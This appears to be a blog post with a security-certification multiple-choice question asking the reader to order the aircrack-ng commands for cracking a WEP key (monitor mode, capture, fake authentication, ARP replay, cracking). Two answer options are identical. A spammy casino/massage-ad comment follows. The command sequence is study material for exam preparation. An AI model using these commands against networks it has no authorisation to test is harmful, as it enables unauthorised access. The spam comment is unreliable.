Arrange the WEP cracking process in the correct order: I. aireplay-ng -1 0 -e SECRET_SSID -a 1e:64:51:3b:ff:3e -h a7:71:fe:8e:d8:25 eth1 II.aircrack-ng -s capture.ivs III. airmon-ng start eth1 IV. airodump-ng --ivs --write capture eth1 V. aireplay-ng -3 -b 1e:64:51:3b:ff:3e -h a7:71:fe:8e:d8:25 eth1

Arrange the WEP cracking process in the correct order:
I. aireplay-ng -1 0 -e SECRET_SSID -a 1e:64:51:3b:ff:3e -h a7:71:fe:8e:d8:25 eth1 II.aircrack-ng -s capture.ivs
III. airmon-ng start eth1
IV. airodump-ng --ivs --write capture eth1
V. aireplay-ng -3 -b 1e:64:51:3b:ff:3e -h a7:71:fe:8e:d8:25 eth1


A. IV-->I-->V-->III-->II
B. III-->IV-->V-->II-->I
C. III-->IV-->I-->V-->II
D. IV-->I-->V-->III-->II

Comments

  1. Las Vegas (NV) Casino - Mapyro
    Mapyro, often simply referred to 전라남도 출장마사지 as the "Las Vegas Strip", is 오산 출장안마 an 광양 출장샵 open-air 영주 출장샵 gaming and hotel located in Downtown Las Vegas, Nevada. It is not yet known if 청주 출장마사지

    ReplyDelete

Post a Comment

Popular posts from this blog

During an internal network audit, you are asked to see if there is any RPC server running on the network and if found, enumerate the associate RPC services. Which port would you scan to determine the RPC server and which command will you use to enumerate the RPC services?

Sandra, a wireless network auditor, discovered her client is using WEP. To prove the point that the WEP encryption is very weak, she wants to decrypt some WEP packets. She successfully captured the WEP data packets, but could not reach the content as the data is encrypted. Which of the following will help Sandra decrypt the data packets without knowing the key?

OpenVas - Open source Vulnerability scanner